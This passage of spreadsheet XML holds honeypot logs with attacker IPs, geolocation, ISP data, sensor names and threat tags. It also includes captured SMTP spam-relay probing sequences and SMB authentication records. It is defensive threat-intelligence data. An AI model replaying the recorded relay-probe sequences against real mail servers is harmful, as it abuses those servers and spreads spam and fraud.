(,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,33665)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,34817)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,42561)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,58273)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,59137)}</t>
  </si>
  <si>
    <t>::ffff:515b:e862</t>
  </si>
  <si>
    <t>ba34664301b1b03691e7de39318fadc6</t>
  </si>
  <si>
    <t>181.126.228.239</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>::ffff:b57e:e4ef</t>
  </si>
  <si>
    <t>c3c9758cccba2878e1346c41051a25bf</t>
  </si>
  <si>
    <t>45.144.212.166</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>Kprohost</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 26 Mar 2025 02:02:37 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;xx@mail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;fede-xoffice@gmx.com.my&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;atmpayment512@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;moneygram0901@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;salisuibrahim316@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;servicecustomer529@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 26 Mar 2025 10:18:56 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 27 Mar 2025 12:04:49 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 02:43:15 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 09:51:26 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:2d90:d4a6</t>
  </si>
  <si>
    <t>b13cfff63fd181a05b07d87170b86d7f</t>
  </si>
  <si>
    <t>114.35.124.116</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-124-116.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7223:7c74</t>
  </si>
  <si>
    <t>99115a92dff13f16677993b59aff1fe4</t>
  </si>
  <si>
    <t>136.226.234.169</t>
  </si>
  <si>
    <t>139963</t>
  </si>
  <si>
    <t>1.29618</t>
  </si>
  <si>
    <t>103.791</t>
  </si>
  <si>
    <t>53813</t>
  </si>
  <si>
    <t>ZSCALER, INC.</t>
  </si>
  <si>
    <t>Zscaler, Inc.</t>
  </si>
  <si>
    <t>::ffff:88e2:eaa9</t>
  </si>
  <si>
    <t>0a38857986eecc802784bef1a297eea6</t>
  </si>
  <si>
    <t>118.136.226.230</t>
  </si>
  <si>
    <t>-6.23406</t>
  </si>
  <si>
    <t>106.824</t>
  </si>
  <si>
    <t>23700</t>
  </si>
  <si>
    <t>Linknet-Fastnet ASN</t>
  </si>
  <si>
    <t>FastNet512</t>
  </si>
  <si>
    <t>::ffff:7688:e2e6</t>
  </si>
  <si>
    <t>41212d90a98c6f2f6f212a4b95e91b0e</t>
  </si>
  <si>
    <t>174.50.43.173</t>
  </si>
  <si>
    <t>c-174-50-43-173.hsd1.la.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Louisiana</t>
  </si>
  <si>
    <t>Caddo</t>
  </si>
  <si>
    <t>Shreveport</t>
  </si>
  <si>
    <t>4341513</t>
  </si>
  <si>
    <t>71150</t>
  </si>
  <si>
    <t>32.5252</t>
  </si>
  <si>
    <t>-93.7502</t>
  </si>
  <si>
    <t>::ffff:ae32:2bad</t>
  </si>
  <si>
    <t>a98e0b5612240e687f144181c73e6662</t>
  </si>
  <si>
    <t>49.229.36.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;26101&amp;&amp;1433</t>
  </si>
  <si>
    <t>Ratchathewi (Khwaeng Samsen Nai)</t>
  </si>
  <si>
    <t>13.7683</t>
  </si>
  <si>
    <t>100.54</t>
  </si>
  <si>
    <t>45458</t>
  </si>
  <si>
    <t>ADVANCED WIRELESS NETWORK COMPANY LIMITED</t>
  </si>
  <si>
    <t>Advanced Wireless Network Company Limited</t>
  </si>
  <si>
    <t>SattahipCommercialPierNavalBase by AWN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52328)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52690)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52323)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52965)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,55455)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,56120)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:31e5:2462</t>
  </si>
  <si>
    <t>5c2558f6c78e97ab7b5d60908cb29ab6</t>
  </si>
  <si>
    <t>118.70.220.72</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>2007-08-08</t>
  </si>
  <si>
    <t>IPxDSL-NET</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (118.70.220.72,53096)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.70.220.72,57907)}&amp;&amp;{Data_SMB:Incoming connection (118.70.220.72,61889)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7646:dc48</t>
  </si>
  <si>
    <t>b95f7a6b17bd3c3000a78c38c4a528b5</t>
  </si>
  <si>
    <t>103.165.211.138</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;5900&amp;&amp;9100&amp;&amp;389&amp;&amp;24061&amp;&amp;1433</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,61467)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,62044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,53807)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,56930)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,57587)}</t>
  </si>
  <si>
    <t>::ffff:67a5:d38a</t>
  </si>
  <si>
    <t>15e977b6962c3c30c8c0475d0ac8783b</t>
  </si>
  <si>
    <t>188.212.13.182</t>
  </si>
  <si>
    <t>Moldova</t>
  </si>
  <si>
    <t>CU</t>
  </si>
  <si>
    <t>Chișinău Municipality</t>
  </si>
  <si>
    <t>Chisinau</t>
  </si>
  <si>
    <t>618426</t>
  </si>
  <si>
    <t>MD-2000</t>
  </si>
  <si>
    <t>47.0617</t>
  </si>
  <si>
    <t>28.9442</t>
  </si>
  <si>
    <t>8926</t>
  </si>
  <si>
    <t>Moldtelecom SA</t>
  </si>
  <si>
    <t>JSC MOLDTELECOM SA</t>
  </si>
  <si>
    <t>JSC Moldtelecom S.A.</t>
  </si>
  <si>
    <t>::ffff:bcd4:db6</t>
  </si>
  <si>
    <t>13d3bde1a4d6e17bbafa2b0264efc3c1</t>
  </si>
  <si>
    <t>117.255.178.247</t>
  </si>
  <si>
    <t>BSNL-GSM-NorthZone</t>
  </si>
  <si>
    <t>::ffff:75ff:b2f7</t>
  </si>
  <si>
    <t>3d1f16ed9386b66a9c6ae1dea5606f00</t>
  </si>
  <si>
    <t>202.83.19.22</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>389&amp;&amp;445&amp;&amp;35390&amp;&amp;1433</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.22,50125)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.22,50705)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:ca53:1316</t>
  </si>
  <si>
    <t>125ccdb68bd7fe73d870b77b80d8ddea</t>
  </si>
  <si>
    <t>115.70.158.91</t>
  </si>
  <si>
    <t>91.158.70.115.static.exetel.com.au&amp;&amp;NA</t>
  </si>
  <si>
    <t>QLD</t>
  </si>
  <si>
    <t>Queensland</t>
  </si>
  <si>
    <t>Brisbane</t>
  </si>
  <si>
    <t>Fortitude Valley</t>
  </si>
  <si>
    <t>6943577</t>
  </si>
  <si>
    <t>4006</t>
  </si>
  <si>
    <t>-27.4539</t>
  </si>
  <si>
    <t>153.033</t>
  </si>
  <si>
    <t>10143</t>
  </si>
  <si>
    <t>SUPERLOOP (AUSTRALIA) PTY LTD</t>
  </si>
  <si>
    <t>EXETEL-Broadband</t>
  </si>
  <si>
    <t>::ffff:7346:9e5b</t>
  </si>
  <si>
    <t>d5c169189e6737d6366c2124b8adf624</t>
  </si>
  <si>
    <t>124.217.251.164</t>
  </si>
  <si>
    <t>NA&amp;&amp;bayarvrider.com</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_DHCP_H6&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H16&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;67&amp;&amp;3915&amp;&amp;53&amp;&amp;37102&amp;&amp;NA</t>
  </si>
  <si>
    <t>Kedah</t>
  </si>
  <si>
    <t>Pokok Sena</t>
  </si>
  <si>
    <t>Kampong Bukit Tinggi</t>
  </si>
  <si>
    <t>1770086</t>
  </si>
  <si>
    <t>6.2</t>
  </si>
  <si>
    <t>100.433</t>
  </si>
  <si>
    <t>45839</t>
  </si>
  <si>
    <t>Shinjiru Technology Sdn Bhd</t>
  </si>
  <si>
    <t>::ffff:7cd9:fba4</t>
  </si>
  <si>
    <t>819c95b47073f14b28bf38375cd2b3da</t>
  </si>
  <si>
    <t>79.18.18.44</t>
  </si>
  <si>
    <t>Tuscany</t>
  </si>
  <si>
    <t>Florence</t>
  </si>
  <si>
    <t>3176959</t>
  </si>
  <si>
    <t>50123</t>
  </si>
  <si>
    <t>43.7696</t>
  </si>
  <si>
    <t>11.2558</t>
  </si>
  <si>
    <t>ASN-IBSNAZ</t>
  </si>
  <si>
    <t>Interbusiness</t>
  </si>
  <si>
    <t>::ffff:4f12:122c</t>
  </si>
  <si>
    <t>3d6756a18ebf78d804f0cf7f7a623552</t>
  </si>
  <si>
    <t>117.196.178.195</t>
  </si>
  <si>
    <t>::ffff:75c4:b2c3</t>
  </si>
  <si>
    <t>dc50d3b17a6fa91adcdb969137753c53</t>
  </si>
  <si>
    <t>121.160.134.239</t>
  </si>
  <si>
    <t>Seoul (Yeongeon-dong)</t>
  </si>
  <si>
    <t>37.5787</t>
  </si>
  <si>
    <t>127.0</t>
  </si>
  <si>
    <t>::ffff:79a0:86ef</t>
  </si>
  <si>
    <t>1bbfae9907c2b0f5515891c7ae2955bf</t>
  </si>
  <si>
    <t>103.184.52.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;1080&amp;&amp;445&amp;&amp;43558&amp;&amp;1433</t>
  </si>
  <si>
    <t>-6.2246500000000005</t>
  </si>
  <si>
    <t>106.811</t>
  </si>
  <si>
    <t>141898</t>
  </si>
  <si>
    <t>PT Milenial Inti Telekomunikasi</t>
  </si>
  <si>
    <t>PT Inti Kreatif Indonesia</t>
  </si>
  <si>
    <t>2022-03-22</t>
  </si>
  <si>
    <t>IDNIC-JALANNGETOP-ID</t>
  </si>
  <si>
    <t>::ffff:67b8:3462</t>
  </si>
  <si>
    <t>62e71267c9735ff4ff160c174f342779</t>
  </si>
  <si>
    <t>61.231.16.179</t>
  </si>
  <si>
    <t>::ffff:3de7:10b3</t>
  </si>
  <si>
    <t>f5f8ae207d78b96a57aa962c0a06adfc</t>
  </si>
  <si>
    <t>36.227.235.223</t>
  </si>
  <si>
    <t>Xindian District</t>
  </si>
  <si>
    <t>1674828</t>
  </si>
  <si>
    <t>24.9601</t>
  </si>
  <si>
    <t>121.539</t>
  </si>
  <si>
    <t>::ffff:24e3:ebdf</t>
  </si>
  <si>
    <t>264e0d7ab7df40cab5dc6aac19f51907</t>
  </si>
  <si>
    <t>195.211.191.7</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>2009-10-30</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 23:40:34 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 2 Apr 2025 13:43:11 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 5 Apr 2025 09:12:38 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 16:35:31 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bf07</t>
  </si>
  <si>
    <t>38fbd1327b246a4f1907efc608a82abe</t>
  </si>
  <si>
    <t>106.51.61.94</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;27495&amp;&amp;1433&amp;&amp;445&amp;&amp;54726&amp;&amp;54717</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,50904)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,51631)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,64740)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,49737)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,61808)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,62754)}</t>
  </si>
  <si>
    <t>::ffff:6a33:3d5e</t>
  </si>
  <si>
    <t>36ca61e12c42a27cf2455cd21766bd8a</t>
  </si>
  <si>
    <t>177.116.144.226</t>
  </si>
  <si>
    <t>Belo Horizonte</t>
  </si>
  <si>
    <t>3470127</t>
  </si>
  <si>
    <t>-19.9208</t>
  </si>
  <si>
    <t>-43.9378</t>
  </si>
  <si>
    <t>26599</t>
  </si>
  <si>
    <t>::ffff:b174:90e2</t>
  </si>
  <si>
    <t>9539d7d156ee8dcb55d5816ee9e10d85</t>
  </si>
  <si>
    <t>195.50.207.238</t>
  </si>
  <si>
    <t>NA&amp;&amp;238-207-50-195.sta.estpak.ee</t>
  </si>
  <si>
    <t>EE</t>
  </si>
  <si>
    <t>Estonia</t>
  </si>
  <si>
    <t>37</t>
  </si>
  <si>
    <t>Harjumaa</t>
  </si>
  <si>
    <t>Tallinn</t>
  </si>
  <si>
    <t>Tallinn (Lasnamäe linnaosa)</t>
  </si>
  <si>
    <t>588409</t>
  </si>
  <si>
    <t>59.4388</t>
  </si>
  <si>
    <t>24.8046</t>
  </si>
  <si>
    <t>3249</t>
  </si>
  <si>
    <t>Telia Eesti AS</t>
  </si>
  <si>
    <t>::ffff:c332:cfee</t>
  </si>
  <si>
    <t>9a86069802a7fcbb9503a292f04300ea</t>
  </si>
  <si>
    <t>117.193.253.195</t>
  </si>
  <si>
    <t>::ffff:75c1:fdc3</t>
  </si>
  <si>
    <t>9c18a8b3231d3eb38e65d2e32023faf8</t>
  </si>
  <si>
    <t>103.175.83.92</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;6379&amp;&amp;9154</t>
  </si>
  <si>
    <t>Bali</t>
  </si>
  <si>
    <t>Badung Regency</t>
  </si>
  <si>
    <t>Banjar Jabejero</t>
  </si>
  <si>
    <t>7334406</t>
  </si>
  <si>
    <t>-8.59554</t>
  </si>
  <si>
    <t>115.272</t>
  </si>
  <si>
    <t>138064</t>
  </si>
  <si>
    <t>PT. Jinom Network Indonesia</t>
  </si>
  <si>
    <t>2021-10-27</t>
  </si>
  <si>
    <t>JINOM-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,62033)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,50879)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51346)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51186)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51834)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,61308)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,61700)}</t>
  </si>
  <si>
    <t>::ffff:67af:535c</t>
  </si>
  <si>
    <t>fc028f9eb8db2e3889d3e30ebba8ead0</t>
  </si>
  <si>
    <t>77.29.170.119</t>
  </si>
  <si>
    <t>MK</t>
  </si>
  <si>
    <t>North Macedonia</t>
  </si>
  <si>
    <t>Grad Skopje</t>
  </si>
  <si>
    <t>Šuto Orizari</t>
  </si>
  <si>
    <t>Šuto Orizare</t>
  </si>
  <si>
    <t>833258</t>
  </si>
  <si>
    <t>42.04</t>
  </si>
  <si>
    <t>21.425</t>
  </si>
  <si>
    <t>6821</t>
  </si>
  <si>
    <t>Makedonski Telekom AD-Skopje</t>
  </si>
  <si>
    <t>MT Adsl</t>
  </si>
  <si>
    <t>2008-01-24</t>
  </si>
  <si>
    <t>::ffff:4d1d:aa77</t>
  </si>
  <si>
    <t>0153da59a95cc0c9fa30aa32785cbefa</t>
  </si>
  <si>
    <t>117.222.107.242</t>
  </si>
  <si>
    <t>::ffff:75de:6bf2</t>
  </si>
  <si>
    <t>cb66a9d292e55a8f1e7270a6b7c61553</t>
  </si>
  <si>
    <t>147.185.133.124</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_MT-CPA_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;50939&amp;&amp;25193&amp;&amp;443&amp;&amp;1080&amp;&amp;110&amp;&amp;50534&amp;&amp;6667&amp;&amp;56623&amp;&amp;5900&amp;&amp;56650&amp;&amp;50566</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;GET&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:857c</t>
  </si>
  <si>
    <t>e41ac3974ef2b5aa073acb4fd5ae59fb</t>
  </si>
  <si>
    <t>202.61.121.170</t>
  </si>
  <si>
    <t>Chennai (Pallikaranai)</t>
  </si>
  <si>
    <t>600100</t>
  </si>
  <si>
    <t>12.9389</t>
  </si>
  <si>
    <t>80.2121</t>
  </si>
  <si>
    <t>133000</t>
  </si>
  <si>
    <t>ARJUN TELECOM PVT. LTD.</t>
  </si>
  <si>
    <t>Arjun Telecom Pvt. Ltd.</t>
  </si>
  <si>
    <t>::ffff:ca3d:79aa</t>
  </si>
  <si>
    <t>7018e4e71176a38aa53a935bbd454173</t>
  </si>
  <si>
    <t>45.164.177.168</t>
  </si>
  <si>
    <t>::ffff:2da4:b1a8</t>
  </si>
  <si>
    <t>4a8c9c73c794b51658e371bb1d2cdcae</t>
  </si>
  <si>
    <t>116.98.249.129</t>
  </si>
  <si>
    <t>::ffff:7462:f981</t>
  </si>
  <si>
    <t>87148781310b537a7c94e1dcfc85644b</t>
  </si>
  <si>
    <t>117.243.240.68</t>
  </si>
  <si>
    <t>::ffff:75f3:f044</t>
  </si>
  <si>
    <t>69e63a111f2889cbcceb26fd6b35f7ae</t>
  </si>
  <si>
    <t>103.38.15.3</t>
  </si>
  <si>
    <t>1433&amp;&amp;54461&amp;&amp;54453</t>
  </si>
  <si>
    <t>Ernakulam</t>
  </si>
  <si>
    <t>Kochi (Pallimukku)</t>
  </si>
  <si>
    <t>1273874</t>
  </si>
  <si>
    <t>682016</t>
  </si>
  <si>
    <t>76.2876</t>
  </si>
  <si>
    <t>133301</t>
  </si>
  <si>
    <t>DWANIRINN</t>
  </si>
  <si>
    <t>Dwan Supports P LTD</t>
  </si>
  <si>
    <t>2014-08-29</t>
  </si>
  <si>
    <t>::ffff:6726:f03</t>
  </si>
  <si>
    <t>66948d0756068da618c768444b6e2279</t>
  </si>
  <si>
    <t>117.208.197.138</t>
  </si>
  <si>
    <t>::ffff:75d0:c58a</t>
  </si>
  <si>
    <t>232e665e2bc8d83587b7a245e46bba05</t>
  </si>
  <si>
    <t>195.211.191.41</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>25&amp;&amp;NA&amp;&amp;60532</t>
  </si>
  <si>
